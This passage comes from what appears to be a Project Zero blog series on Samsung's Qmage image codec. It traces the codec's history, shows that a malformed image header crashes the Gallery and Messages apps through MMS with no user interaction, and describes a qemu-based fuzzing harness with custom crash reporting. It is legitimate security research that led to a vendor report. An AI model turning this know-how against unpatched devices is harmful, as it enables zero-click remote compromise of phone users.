src/platform/kk/external/skia/src/images/SkImageDecoder_libqmage.cpp. I suspect that the "kk" subdirectory name relates to Android KitKat (version 4.4.4), whose release time frame coincides with the period when Qmage in Skia was first spotted in Samsung firmware (around June 2014). The code itself doesn't contain too much detail about the internals of the codec, as it delegates the actual parsing work to the QuramQmageDecParseHeader and QuramQmageDecodeFrame functions mentioned before. On the other hand, it gave me some psychological comfort and motivation to look for further clues and information – perhaps I wouldn't have to be limited to just ARM assembly and reverse-engineered structure layouts with made up field names, after all.

More Qmage versions, parsers, and symbols – QMG boot animations

I will try to keep the section as brief as possible, even though it could easily fill a whole blog post on its own. The history of the Qmage format in Samsung devices is in fact much longer than the time span between 2014 and 2020 – before being incorporated in Skia, it had been used as the container format for boot and shutdown animations since early versions of Samsung Android, and theme resources in the pre-Android era. If you browse some mobile phone-related forums such as XDA Developers or oldph.one, you will find a number of references to "Qmage" and "qmg" in those contexts. You can also check for yourself, by looking for .qmg files on the file system of a modern Samsung phone. On my Note 10+, I can find the following three:

  • /system/media/bootsamsungloop.qmg
  • /system/media/bootsamsung.qmg
  • /system/media/shutdown.qmg

Since these files represent animations and not static bitmaps, they are encoded differently than the Qmage samples we have seen so far. Let's have a look at their headers:

d2s:/ $ for file in /system/media/*.qmg; do xxd -g 1 -l 16 $file; done
00000000: 51 4d 0f 00 80 00 a0 05 e0 0b 00 20 7b 50 00 00  QM......... {P..
00000000: 51 4d 0f 00 80 00 a0 05 e0 0b 00 20 7b 50 00 00  QM......... {P..
00000000: 51 4d 0f 00 80 00 a0 05 e0 0b 00 20 83 50 00 00  QM......... .P..
d2s:/ $

They are stored in the old, familiar "QM" format, but with the version byte set to 0x0F instead of 0x01. Based on my research, I have concluded that QM animations have been assigned versions starting with 0x0B (11) up to 0x0F (15), which is currently the most recent one. The exact logic behind this versioning system is unknown; one unconfirmed hypothesis is that QM animation versions are expressed as X+10 where X is the corresponding static format version. Importantly, the animated images don't seem to be compatible with the static ones, so they cannot be easily used as input test cases for Skia.

The animations are displayed by the /system/bin/bootanimation system executable, which in turn uses a dedicated libQmageDecoder.so library (currently at around ~600 kB) for parsing the files. On a high level, the libQmageDecoder interfaces are similar to Skia's, but the inner workings start to differ deeper down the call stack. A general overview of the header parsing control flow is shown below:

QmageDecParseHeader
└── QmageDecCommon_ParseHeader
    ├── QmageDecCommon_QmageAudioVersionCheck
    ├── QmageDecCommon_QGetDecoderInfo
    ├── QmageDecCommon_VGetDecoderInfo
    └── QmageDecCommon_WGetDecoderInfo

Within these functions, the following file signatures are being checked for: AUQM, NQ, QM, PFR, IM, IFEG, IT, QW. We have already seen most of them in Skia, but the first two on the list are completely new. This goes to show the depth of Quramsoft's portfolio in terms of the variety of invented file formats.

Furthermore, here is a simplified outline of the frame decoding process and the involved functions in the current libQmageDecoder.so on Android 10:

QmageDecodeAniFrame
├── checkDecodeQueue
│   └── QphotoThreadManager::checkDecodeQueue
│       └── QphotoThreadPool::run
│           └── QmageJob::run
│               └── Qmage_WDecodeAniFrameThreadJob_Low
│                   └── Qmage_WDecodeFrame_Low
│                       └── _QM_WCodec_decode
│                           └── PVcodecDecoderIndex
│                           └── PVcodecDecoderGrayScale
│                           └── PVcodecDecoder
└── Qmage_VDecodeAniFrame_Low
    ├── Qmage_VDecodeFrame_Low
    │   └── _QM_DecodeOneFrame_A9LL_TINY
    │   └── _QM_DecodeOneFrame_A9LL
    │   └── _QM_DecodeOneFrame_A9LL_alpha
    ├── _QM_DecodeOneFrame_A9LL_ani_LineSkip
    ├── _QM_DecodeOneFrame_A9LL_ani
    └── _QM_DecodeOneFrame_A9LL_ani_alpha

There are a number of previously unknown routines here under the Qmage_VDecode path, but there is also a very familiar subtree starting at Qmage_WDecodeFrame_Low, which we've already seen in Skia. But why is it even important, considering that boot animations are not really an attack surface? That's because the libQmageDecoder.so module in Samsung phones shipped with debug symbols for a long time – starting in mid-2010 with Android 2.1 (Eclair), up to various Samsung Android 4.3 firmwares published in 2013. During that time frame, the ELF file included not just function names, but also source file names and line numbers, full structure layouts, enum names, local variable names etc. It is a goldmine of useful information about the evolution of the codec during these years, and includes many details of the inner workings that still apply to this day.

For example, if we take libQmageDecoder.so from a Galaxy S Duos (Android 4.0.4, Jan 2013 build), we can use readelf and objdump to determine that:

  • The library compilation directory was /home2/cheus/Froyo/Froyo22_Qmage
  • It consisted of the following source files:
    • external/Qmage/QmageDecoderLIB/src/QmageDecCommon.c, 1547 lines of code
    • external/Qmage/QmageDecoderLIB/src/QmageDecoder.c, 219 LOC
    • external/Qmage/QmageDecoderLIB/src/Qmage_FDecoder_Low.c, 74 LOC
    • external/Qmage/QmageDecoderLIB/src/Qmage_VDecoder_Low.c, 3954 LOC
    • external/Qmage/QmageDecoderLIB/src/Qmage_WDecoder_Low.c, 5458 LOC
    • external/Qmage/QmageInterface/QmageInterface.c, 113 LOC
  • and the following headers:
    • external/Qmage/QmageDecoderLIB/src/QmageDecType.h
    • external/Qmage/QmageDecoderLIB/src/QmageDecCommon.h

We get access to some very helpful structures:

(gdb) ptype Qmage_DecderLowInfo
type = struct {
    QM_BOOL Ver200_SPEED;
    QM_BOOL IS_ANIMATION;
    QM_BOOL UseExtraException;
    QM_BOOL tiny;
    QM_BOOL IsDyanmicTable;
    QM_BOOL IsOpaque;
    QM_BOOL NearLossless;
    QMINT32 SIZE_SHIFT;
    QMINT32 ANI_RANGE;
    QMINT32 qp;
    QMINT32 mode_bit;
    QMINT32 header_len;
    QM_BOOL NotComp;
    QM_BOOL NotAlphaComp;
    QMINT32 alpha_decode_flag;
    QMINT32 depth;
    QMINT32 alpha_depth;
    Qmage_VDecoderVMODE_T mode;
    Qmage_V_DecoderVersion vversion;
    Qmage_F_DecoderVersion fversion;
    Qmage_DecoderVersion qversion;
    QmageDecodeCodecType rgb_encoder_mode;
    QmageDecodeCodecType alpha_encoder_mode;
    QmageRawImageType out_type;
}
(gdb)

and equally interesting enums:

(gdb) ptype QmageDecodeCodecType
type = enum {QMAGE_DEC_V16_SHORT_INDEX, QMAGE_DEC_W2_PASS, QMAGE_DEC_V16_BYTE_INDEX, QMAGE_DEC_W1_PASS, QMAGE_DEC_FCODEC, QMAGE_DEC_W1_PASS_FROM_W_ADAPTIVE, QMAGE_DEC_V24_SHORT_INDEX, QMAGE_DEC_W2_PASS_ONLY, QMAGE_DEC_PV, QMAGE_DEC_SLV, QMAGE_DEC_QV}
(gdb)

not to mention some very clean decompiler output:

Hex-Rays decompilation output

It was only after finding this extended debug metadata that I started to understand how parts of the codec actually worked. I would highly recommend referring to these symbols if you are planning to perform any Qmage-related research; many of them may be even cleanly ported to a modern Skia disassembly database.

During a similar time frame around 2010, Samsung was also still producing non-Android mobile phones, which also have traces of Qmage in their underlying custom OS. Two examples of such devices are Samsung GT-B5722 (released in 2009) and Samsung GT-C5010 Squash (released in 2010):

Official Samsung product photos

Their firmware was again compiled with debug data built in, with many references to Qmage too. Let's take a look at the B5722 firmware – it contains a B5722_Master.x file which is a fairly regular ARM ELF executable, so we can load it in gdb-multiarch or IDA Pro and browse around or dump some types. As an example, we can find our favorite Qmage_WDecodeFrame_Low function, and explore its ascendants and descendants in the function control flow:

lkres_IFEGBodyDecode
├── QmageDecodeAniFrame
│   └── Qmage_VDecodeAniFrame_Low
│       ├── Qmage_VDecodeFrame_Low
│       │   ├── _QM_DecodeOneFrame_A9LL_TINY
│       │   ├── _QM_DecodeOneFrame_A9LL
│       │   └── _QM_DecodeOneFrame_A9LL_alpha
│       ├── _QM_DecodeOneFrame_A9LL_ani
│       └── _QM_DecodeOneFrame_A9LL_ani_alpha
├── QmageDecodeFrame
│   ├── Qmage_VDecodeFrame_Low
│   ├── Qmage_FDecodeFrame_Low
│   └── Qmage_WDecodeFrame_Low
│       └── _QM_WCodec_decode
│           ├── _QM1st_decode
│           └── _QM_WCodec_2nd_decode
└── IFEGDecodeFrame
    ├── IFEGDecodeFrame_DCT
    ├── IFEGDecodeFrame_Pad
    └── IFEGDecodeFrame_NoPad

In the above tree, we can recognize the "V" codec and the subtree responsible for processing animations, and the "W" codec handling static bitmaps, but there is also a whole new branch of code related to the decoding of IFEG. As you may remember from earlier in this post, this was one of the left-over magic values looked for by QmageDecCommon_VersionCheck_Rev8253_140615 in modern Skia – now we can see the format was actually used 10+ years ago. Additionally, all three of these code paths have a common ancestor in the lkres_IFEGBodyDecode function, which shows even more clearly that the IFEG and Qmage formats are closely related, with the former likely being some form of a predecessor of the latter. We can also verify that GT-B5722's embedded resources were encoded in both formats, by inspecting the B5722_Master.cfg file which enumerates the contents of the B5722_Master.tfs binary blob:

FILE_NAME : /a/images/13_pictbridge_pictbridge_top.ifg
FILE_SIZE : 6908
FILE_NAME : /a/images/13_pictbridge_pictbridge_top_hui.ifg
FILE_SIZE : 4766
FILE_NAME : /a/images/13_pictbridge_progress_bg.ifg
FILE_SIZE : 1304
FILE_NAME : /a/images/13_pictbridge_progress_bg_hui.ifg
FILE_SIZE : 594
FILE_NAME : /a/images/13_pictbridge_sending_ani01.ifg
[...]
FILE_NAME : /a/multimedia/imgapp/imgapp_default_image.qmg
FILE_SIZE : 39128
FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_detail.qmg
FILE_SIZE : 800
FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_detail_focus.qmg
FILE_SIZE : 1152
FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_edit.qmg
FILE_SIZE : 1340
FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_edit_focus.qmg

Based on this, we now know that Qmage files (in some shape) made their first appearance in Samsung devices around 2009-2010. But what about IFEG, and for how long has Samsung been shipping Quramsoft decoders? To answer that question, I delved into even older builds of the firmware and tried to bisect the debut of the custom codecs. The first ever phone that I have confirmed to use the IFEG format is Samsung SGH-D600, which launched in 2005. Almost all of its resources are encoded as .ifg files, and the software itself contains a number of relevant strings such as lk_ifegDecode, IFEGGetVersion, IFEGGetImageSize, IFEGDecodeFrame etc. This seems in line with Quramsoft's own declaration that their collaboration with Samsung started around June 2005. 

To make the story even more complex, the vendor was not even called "Quram" at the time; it was known under the name "I-master". Even though the switch to the current name took place in 2007, artifacts such as symbol names containing "Imaster" or "IM" could be found in Samsung's libraries for a few more years, e.g. Imaster_Malloc, ImasterVDecoder_ParseHeader, ImasterVDecErr_FAIL, IM_DecodeOneFrame_A9LL, etc. This could explain the meaning of the obsolete "IM" file signature mentioned earlier in this post, which I have seen used only once – as the container for boot animations on the very first Samsung phone running Android, Samsung GT-I7500 Galaxy released in 2009. What a ride! :)

To gather all this information in one place, I have compiled the following timeline showing the development of all Quramsoft image codecs I have observed shipping in Samsung devices over the years. While the presented data is based on my examination of dozens of firmwares, the Android ecosystem is a vastly complex one and involves thousands of software builds, so I make no promises as to the accuracy of the analysis below. If you spot any errors or inconsistencies that you can correct, please reach out and I will be happy to update this post.

Timeline of Quramsoft image codecs found on Samsung devices

As we can see, while Qmage has "only" been natively supported on Samsung Android since late 2014, the history of collaboration between Samsung and Quramsoft has lasted much longer. Reverse engineering these older binaries provided me with a lot of interesting insights, and pragmatically useful information such as the debug symbols from non-stripped executables. The extra context proved valuable later in the project and quite honestly, it also satisfied my curiosity, which is an important part. :)

Initial pokes at the codec

With all this historic background behind us, it's time to see how the codec can be broken today, or rather could be broken before the May 2020 update. Let's go back to the original accessibility_light_easy_off.qmg sample we extracted before. We can open it in a hex editor again, and to start with a simple test, consider which parts are most likely to cause problems when corrupted. For bitmaps, the obvious candidates are the dimensions, so I modified the width and height just slightly (344 → 345) and tried to open it in Gallery on a system with the February 2020 patch level:

Failed attempt to display a corrupted Qmage file in Gallery

It wouldn't load anymore. It's worth noting that the Qmage codec is packed with __android_log_print calls, so we can grep for them with logcat to get some more information on what happened:

d2s:/ $ logcat -v tag | egrep "QG|Qmage"
E/QG      : Qmage decoder error return value -298
E/Qmage   : Qmage QuramQmageDecodeFrame offset <= 0, offset: -298

These log messages tend to be helpful from time to time, so it's worth keeping them in mind. With such a small change in the file, nothing bad seems to have happened, beyond a rightful error being thrown by the codec. What if we increase the dimensions even more, let's say from 0x158 (344) each to 0x558 (1368) each?

Bit flips manually applied to the Qmage header

Let's try it:

Gallery app crash notification

The Gallery app instantly crashes. The full context can be extracted with logcat:

130|d2s:/ $ logcat -b crash -v raw
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x700b9ffc90 in tid 12442 (thumbThread2), pid 12395 (droid.gallery3d)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'samsung/d2sxx/d2s:10/QP1A.190711.020/N975FXXS2BTA7:user/release-keys'
Revision: '24'
ABI: 'arm64'
pid: 12395, tid: 12442, name: thumbThread2  >>> com.sec.android.gallery3d <<<
uid: 10125
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x700b9ffc90
    x0  0000000000000000  x1  0000000000000558  x2  fffffffffffffaa8  x3  0000000000000011
    x4  000000700ba00700  x5  0000000000000003  x6  0000000000000000  x7  0000000000000016
    x8  0000000000000000  x9  00000000000003d2  x10 0000000000000004  x11 000000701bc85a16
    x12 0000000000000000  x13 000000701bec0c0f  x14 000000700fc4e00d  x15 000000000000000d
    x16 0000000000000018  x17 0000000000000000  x18 000000703a846000  x19 0000000000000305
    x20 000000700b9ffc90  x21 000000700fb32a80  x22 000000700fb8f200  x23 0000000000088926
    x24 000000005650868a  x25 000000701bec0c00  x26 00000000000003d2  x27 0000000000000007
    x28 0000000000000020  x29 000000703ac3e5f0
    sp  000000703ac3e390  lr  000000700ba00740  pc  0000007136b20d18

backtrace:
      #00 pc 00000000002bbd18  /system/lib64/libhwui.so (PVcodecDecoder_GrayScale_16bits_NEW+3636) (BuildId: fcab350692b134df9e8756643e9b06a0)
      #01 pc 000000000029cefc  /system/lib64/libhwui.so (__QM_WCodec_decode+948) (BuildId: fcab350692b134df9e8756643e9b06a0)
      #02 pc 000000000029c9b0  /system/lib64/libhwui.so (Qmage_WDecodeFrame_Low_Rev14474_20150224+320) (BuildId: fcab350692b134df9e8756643e9b06a0)
      #03 pc 000000000029ae78  /system/lib64/libhwui.so (QuramQmageDecodeFrame_Rev14474_20150224+164) (BuildId: fcab350692b134df9e8756643e9b06a0)
      #04 pc 00000000006e1eec  /system/lib64/libhwui.so (SkQmgCodec::onGetPixels(SkImageInfo const&, void*, unsigned long, SkCodec::Options const&, int*)+1100) (BuildId: fcab350692b134df9e8756643e9b06a0)
[...]

The fact that such a trivial change to the file header was sufficient to trigger a crash did not bode well for the security of the codec. In my experience, no decently tested image parser would crash on such an obvious inconsistency. Then I remembered that the Samsung Messages app also displayed Qmage files, so I sent the malformed image via MMS to see what would happen. To my disbelief, the exact same crash reproduced again, this time in the com.samsung.android.messaging process, and with no user interaction required:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x702ae96b10 in tid 15454 (pool-5-thread-1), pid 7904 (droid.messaging)
[...]
pid: 7904, tid: 15454, name: pool-5-thread-1  >>> com.samsung.android.messaging <<<

This result had to mean that the Messages app automatically decoded images found in incoming messages, even before the user manually opened them. It was a big moment in my research, one which opened the seemingly fragile attack surface to remote exploitation by only knowing the victim's phone number. At that point, I was convinced that the best course of action was to run a thorough coverage-guided fuzzing session of the codec, and report all identified crashes to the vendor. This became my focus for the next couple of weeks, until documenting my findings and filing Issue #2002 in the PZ bug tracker at the end of January 2020. The fuzzing effort will be the subject of the next blog post in the Qmage series. Stay tuned!

Conclusion

It is remarkable that such an attractive vulnerability research area managed to stay out of the public eye for so long. I expect that it was caused primarily by the closed-source nature of the code, and the fact that the implementation was buried so deep down in the image decoding stack, that it was just not expected to find custom OEM code of that extent there. I know I likely wouldn't have found it, if not for my lack of familiarity with Skia on Android, and the desire to learn where the execution of the BitmapFactory interface eventually ended up at (coupled with having a Samsung build of libhwui.so at hand). The fact that there are virtually no references or mentions of this technology online certainly didn't help.

In this write-up, I shared the results of the reconnaissance phase I went through shortly after discovering the codec. As is often the case in my line of work, this process involved spelunking in some pretty archaic areas of code for extended periods of time, to become somewhat of an expert in an obscure field that will never again prove useful outside of this project. :-) Still, I am hoping that it was an interesting read for those who, like me, enjoy some software archeology, and that it also makes a good reference guide to anyone who plans to continue working on Qmage security in the future.  

It is crucial that the security claims made by vendors are constantly challenged, and relevant attack surfaces are exposed and documented. When mistakes happen, it's at the expense of end user security and privacy and rarely the vendor themselves. This is why it's increasingly important for both vendors to follow best practices for security and software testing, and the vigilant security community to ensure that the same mistakes aren't made again. 

MMS Exploit Part 2: Effective Fuzzing of the Qmage Codec

23 July 2020 at 16:32
By: Tim
Posted by Mateusz Jurczyk, Project Zero

This post is the second of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.

Introduction

In Part 1, I discussed how I discovered the "Qmage" image format natively supported on all modern Samsung phones, and how I traced its roots to Android boot animations and even some pre-Android phones. At this stage of the story, we also know that the codec seems very fragile and is likely affected by bugs, and that it constitutes a zero-click remote attack surface via MMS and the default Samsung Messages app. I was at this point of the project in early December 2019. The next logical step was to thoroughly fuzz it – the code was definitely too extensive and complex to approach with a manual audit, especially without access to the original source or expertise of the inner workings of the format. As a big fan of fuzzing, I hoped to be able to run it in accordance with the current state of the art: efficiently (without unnecessary overhead), at scale, with code coverage information, reliable reproducibility and effective deduplication. But how to achieve all this with a codec that is part of Android, accessible only through Skia image API, and precompiled for the ARM/ARM64 architectures only? Read on to find out!

Writing the test harness

The fuzzing harness is usually one of the most critical pieces of a successful fuzzing session, and it was the first thing I started working on. I published the end result of my work as  SkCodecFuzzer on GitHub, and it can be used as a reference while reading this post. My initial goal with the loader was to write a Linux command-line program that could run on physical Android devices, and use the Skia SkCodec interface to load and decode an input image file in exactly the same way (or at least as closely as possible) as the internal Android doDecode function does it. This turned out to be surprisingly easy: if we ignore some largely irrelevant portions of doDecode, such as interactions with the JNI (Java Native Interface), NinePatch related code and scaling, we are left with just a handful of simple method calls. Accordingly, the ProcessImage() function in my harness is less than 100 lines of code. In order to build such an initial version of the loader, I used the Android NDK toolset, included several header files from the Skia source code, and linked it with the libhwui.so library from the target operating system. After copying the executable and an example Qmage file (let's stick with accessibility_light_easy_off.qmg from Part 1) to my test phone, I could test that it worked:

d2s:/data/local/tmp $ ./loader accessibility_light_easy_off.qmg
[+] Detected image characteristics:
[+] Dimensions:      344 x 344
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
[+] codec->GetAndroidPixels() completed successfully
d2s:/data/local/tmp $

It's worth noting that the harness I used for my fuzzing had one extra check, verifying that the input file started with a QM or QG signature. This was necessary to make sure that the coverage-guided fuzzing wouldn't diverge towards other image formats supported by Skia, and only Qmage-related code would remain tested. There is also a slight difference between Android's code and my harness in the specific heap allocation class used (SkBitmap::HeapAllocator vs a selection of possible classes), but that shouldn't matter in any practical way.

Having such a loader run on Android is great, but it doesn't scale very well and my fuzzing tooling is much better on x86 too, so I was very tempted to get it running on the Intel architecture. One solution would be to try and run the same aarch64 ELF in an emulator such as qemu-aarch64. To make this work, we have to make sure that all potential dependencies of the harness are accessible on the host's file system, by pulling the full /system/lib64 directory, the /system/bin/linker64 file, and perhaps further directories such as /apex/com.android.runtime/lib64 from the research phone to our PC. Once we have that, we can try executing the loader under qemu:

[email protected]:~/SkCodecFuzzer/source$ LD_LIBRARY_PATH=$ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/sysroot/usr/lib/aarch64-linux-android:$ANDROID_PATH/lib64 qemu-aarch64 ./loader accessibility_light_easy_off.qmg
[+] Detected image characteristics:
[+] Dimensions:      344 x 344
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
[+] codec->GetAndroidPixels() completed successfully
[email protected]:~/SkCodecFuzzer/source$

If $ANDROID_PATH above points to a directory with Android 9 system files, it works! This is great news as it means that there aren't any fundamental blockers to running emulated Android user-mode components on a x86-64 host. With Android 10 system files, there was one minor issue with an abort thrown by libclang_rt.ubsan_standalone-aarch64-android.so:

==31162==Sanitizer CHECK failed: /usr/local/google/buildbot/src/android/llvm-toolchain/toolchain/compiler-rt/lib/sanitizer_common/sanitizer_posix.cc:371 ((internal_prctl(0x53564d41, 0, addr, size, (uptr)name) == 0)) != (0) (0, 0)
libc: Fatal signal 6 (SIGABRT), code -1 (SI_QUEUE) in tid 31162 (qemu-aarch64), pid 31162 (qemu-aarch64)

By looking at the underlying code, it would seem that an UBSAN_OPTIONS=decorate_proc_maps=0 environment variable should fix the problem, but it didn't, and I didn't investigate further. Instead, I swapped the library with its older copy from Android 9, and the harness correctly worked again.

So, we can now run the Qmage codec on a typical Intel workstation, but one question remains – what is the performance? Software emulation such as qemu's is known to introduce visible overhead as compared to native execution speed. Let's quickly compare the run time of the loader on a Samsung device and in qemu, against the accessibility_light_easy_off.qmg sample:

d2s:/data/local/tmp $ time ./loader accessibility_light_easy_off.qmg >/dev/null
    0m00.12s real     0m00.09s user     0m00.03s system
d2s:/data/local/tmp $

and:

[email protected]:~/SkCodecFuzzer/source$ LD_LIBRARY_PATH=$ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/sysroot/usr/lib/aarch64-linux-android:$ANDROID_PATH/lib64 time qemu-aarch64 ./loader -d -i accessibility_light_easy_off.qmg >/dev/null
real  0m0.380s
user  0m0.355s
sys   0m0.025s
[email protected]:~/SkCodecFuzzer/source$

Based on this simple test, there seems to be a ~3x slowdown when running in the emulator. This is not great but completely acceptable, especially if we can scale it up to numerous machines, and maybe find some further optimizations along the way.

At this point, we have a very basic harness that just decodes an input image using the same Skia interfaces as Android. Let's see how we can make it better fit for fuzzing.

Improvement #1 – custom ASAN-like crash reports

One problem with the loader running under qemu is how crashes are manifested by default:

libc: Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x4089bfc000 in tid 929264 (qemu-aarch64), pid 929264 (qemu-aarch64)

A native SIGSEGV signal is generated in the emulator and caught by the default libc handler. Let's try this again with gdb attached to see where the exception is thrown:

─────────────────────────────────────────────────────────────── code:x86:64
   0x555555fce3ed <code_gen_buffer+7496640> lea    r14, [rbx+0x1]
   0x555555fce3f1 <code_gen_buffer+7496644> shl    r14, 0x8
   0x555555fce3f5 <code_gen_buffer+7496648> sar    r14, 0x8
 → 0x555555fce3f9 <code_gen_buffer+7496652> movzx  r14d, BYTE PTR [r14]
   0x555555fce3fd <code_gen_buffer+7496656> add    rbx, 0x2
   0x555555fce401 <code_gen_buffer+7496660> mov    QWORD PTR [rbp+0xa8], rbx
   0x555555fce408 <code_gen_buffer+7496667> and    r12d, 0xffffff
   0x555555fce40f <code_gen_buffer+7496674> mov    rbx, r12
   0x555555fce412 <code_gen_buffer+7496677> shl    rbx, 0x8
───────────────────────────────────────────────────────────────────── trace
[#0] 0x555555fce3f9 → code_gen_buffer()
[#1] 0x55555563c720 → cpu_exec()
[#2] 0x55555566e528 → cpu_loop()
[#3] 0x5555555f94cd → main()

As we can see, the x86-64 instruction triggering the crash resides in qemu's code generation buffer, and it's hard to trace it to the actual culprit in ARM assembly inside libhwui.so. The native call stack isn't of much help either, as it only shows the qemu internal functions and not the stack frames of the emulated code. Because of all this, working with these raw crashes is incredibly difficult – they are hard to analyze, triage or deduplicate without re-running them on an Android device. There had to be another way to extract accurate information about the emulated ARM CPU context at the time of the crash.

The internal Google fuzzing infrastructure I use for projects like this supports both native crashes (signals) and AddressSanitizer reports. Most importantly, these reports don't have to be 100% identical to legitimate ASAN outputs. They only have to be close enough to be correctly parsed, but they can still contain both fake data (if the specific information is not available in the given context), and some extra sections you don't normally see in ASAN-enabled targets. I have already taken advantage of this behavior a few times in the past, for example in the DrSancov project I published, which aims to convert any closed-source Linux x86(-64) executable into a semi-ASAN/SanitizerCoverage compatible one using the DynamoRIO instrumentation framework. This was my idea here too – if I could register my own signal handler in the harness, it could print out all the relevant context that it has access to within the emulated process, effectively faking an ASAN crash.

The end result is the GeneralSignalHandler function and other unwinding and symbol-related helper routines, which are able to generate pretty crash reports such as the following one:

ASAN:SIGSEGV
=================================================================
==936966==ERROR: AddressSanitizer: SEGV on unknown address 0x408a0e1000 (pc 0x4006605174 sp 0x4000d0adc0 bp 0x4000d0adc0 T0)
    #0 0x002bd174 in libhwui.so (PVcodecDecoder_GrayScale_16bits_NEW+0x2290)
    #1 0x0029cf00 in libhwui.so (__QM_WCodec_decode+0x3b8)
    #2 0x0029c9b4 in libhwui.so (Qmage_WDecodeFrame_Low_Rev14474_20150224+0x144)
    #3 0x0029ae7c in libhwui.so (QuramQmageDecodeFrame_Rev14474_20150224+0xa8)
    #4 0x006e1ef0 in libhwui.so (SkQmgCodec::onGetPixels(SkImageInfo const&, void*, unsigned long, SkCodec::Options const&, int*)+0x450)
    #5 0x004daf00 in libhwui.so (SkCodec::getPixels(SkImageInfo const&, void*, unsigned long, SkCodec::Options const*)+0x358)
    #6 0x006e278c in libhwui.so (SkQmgAdapterCodec::onGetAndroidPixels(SkImageInfo const&, void*, unsigned long, SkAndroidCodec::AndroidOptions const&)+0xac)
    #7 0x004da498 in libhwui.so (SkAndroidCodec::getAndroidPixels(SkImageInfo const&, void*, unsigned long, SkAndroidCodec::AndroidOptions const*)+0x2b0)
    #8 0x0004a9a0 in loader (ProcessImage()+0x55c)
    #9 0x0004ac60 in loader (main+0x6c)
    #10 0x0007e858 in libc.so (__libc_init+0x70)

==936966==DISASSEMBLY
    0x4006605174: ldrb        w9, [x13, #1]
    0x4006605178: add         x13, x13, #2
    0x400660517c: bfi         w9, w2, #8, #0x18
    0x4006605180: stur        w9, [x29, #-0xf8]
    0x4006605184: ldur        w19, [x29, #-0xf4]
    0x4006605188: cbz         x8, #0x40066051fc
    0x400660518c: b           #0x4006605250
    0x4006605190: ldr         x9, [sp, #0x110]
    0x4006605194: orr         w27, wzr, #7
    0x4006605198: ldrb        w4, [x9, #1]!

==936966==CONTEXT
   x0=fffffffffffffaa8  x1=0000000000000558  x2=0000000000000000  x3=0000000000000014
   x4=0000004089d33670  x5=0000000000000003  x6=0000000000000003  x7=0000000000000011
   x8=0000000000000004  x9=0000000000000000 x10=0000000000000004 x11=000000408a0e2f8f
  x12=0000000000000000 x13=000000408a0e0fff x14=000000408a0deffc x15=000000000000001f
  x16=0000000000000018 x17=0000000000000000 x18=00000040013f4000 x19=000000000000005b
  x20=0000000000007000 x21=000000408a0c6f55 x22=000000408a0c4eaa x23=0000000000000000
  x24=0000000095100000 x25=000000408a0e0764 x26=0000000000000005 x27=0000000000000007
  x28=0000000000000128  FP=0000004000d0b020  LR=0000004089d338c0  SP=0000004000d0adc0

==936966==ABORTING

The first section of the report is essential for automation, as it includes the type of the signal and stack trace used for deduplication. The disassembly and register values are supplementary and mostly useful in triage, to quickly determine what kind of crash we are dealing with.

The extra functionality comes at the cost of slightly more difficult compilation, as Capstone and libbacktrace need to have their headers included, and static/shared objects linked into the loader. Fortunately this didn't turn out to be too hard, as outlined in SkCodecFuzzer's README. If you run into any issues during the building process with SkCodecFuzzer, please refer to the Issues section as several related problems have been resolved there.

In its current shape, the signal handler also includes a few interesting workarounds to problems I didn't originally anticipate and only stumbled upon them during development and testing:

  • On Android 10, executable code sections (.text etc.) are marked as Execute Only and are thus non-readable (--x access rights). This caused the signal handler to fail when running on a physical Android device, as Capstone would trigger a nested crash while trying to read the instruction bytes for disassembly. I fixed this with an mprotect call to make the memory readable.
  • If the stack is corrupted (e.g. due to a buffer overflow), the stack unwinding code may crash on invalid memory access. Such "double faults" need to be gracefully handled so that the full crash report is always generated correctly. I fixed this with the DoubleFaultHandler and the globals::in_stack_unwinding flag.
  • The abort libc function (called e.g. by __stack_chk_fail) disables the delivery of all signals other than SIGABRT, making it impossible to catch nested exceptions in the stack unwinder. I fixed this with a sigprocmask call.
  • Crashes occurring at different offsets within standard memory manipulation functions (memcpy, memmove, memset) were wrongly classified as unique, bloating the results and skewing the numbers. I fixed this by detecting these special functions and using their entrypoint addresses in the stack trace, instead of the precise addresses of the faulting instructions.

Improvement #2 – custom low-level allocator (libdislocator)

The custom signal handler is a very useful feature for inspecting and deduplicating crashes, but it helps the most coupled with effective detection of memory safety violations. On Android 9 and 10, Skia uses the default system allocator (jemalloc), which is optimized for performance and not fuzzing. As a result, many tiny out-of-bounds memory accesses may not be detectable at all, as they will just silently fall into the adjacent allocation without corrupting any critical data. In other cases, some bugs may overwrite different adjacent chunks in different test runs due to a non-deterministic heap state, leading to exceptions being thrown further down the line at different locations of the library. All in all, using the default allocator in fuzzing is almost guaranteed to conceal some bugs, and obscure the real root cause of others.

The solution to this problem are allocators specialized for fuzzing, which typically incur a significant memory overhead, but can provide very precise detection of memory bugs at the very moment when they happen. On Windows, examples of such allocators are PageHeap in user-mode and Special Pool in the kernel. On Linux, for closed-source software, there is Electric Fence and of course projects like valgrind for improved bug detection, but my favorite tool for the job is AFL's libdislocator. It is a super lightweight (<300 lines) module that simply implements malloc and free as mmap and mprotect, placing each returned chunk precisely at the end of a mapped memory page. It is easily adjustable, works on x86/ARM, and can be used as both a preloaded .so library, or linked statically into the harness.

In my case, I linked it in statically and redirected allocator calls to it via the malloc_hook mechanism. On Android, enabling these hooks requires setting the LIBC_HOOKS_ENABLE environment variable, which lets us easily switch between libdislocator and jemalloc when needed. Thanks to being able to intercept the heap allocator interface, I could also implement the --log_malloc flag, to log all allocs and frees taking place in the process at runtime. This option proved invaluable to me later during exploit development, as it allowed me to better understand the allocation patterns and identify the crashes most suitable for exploitation.

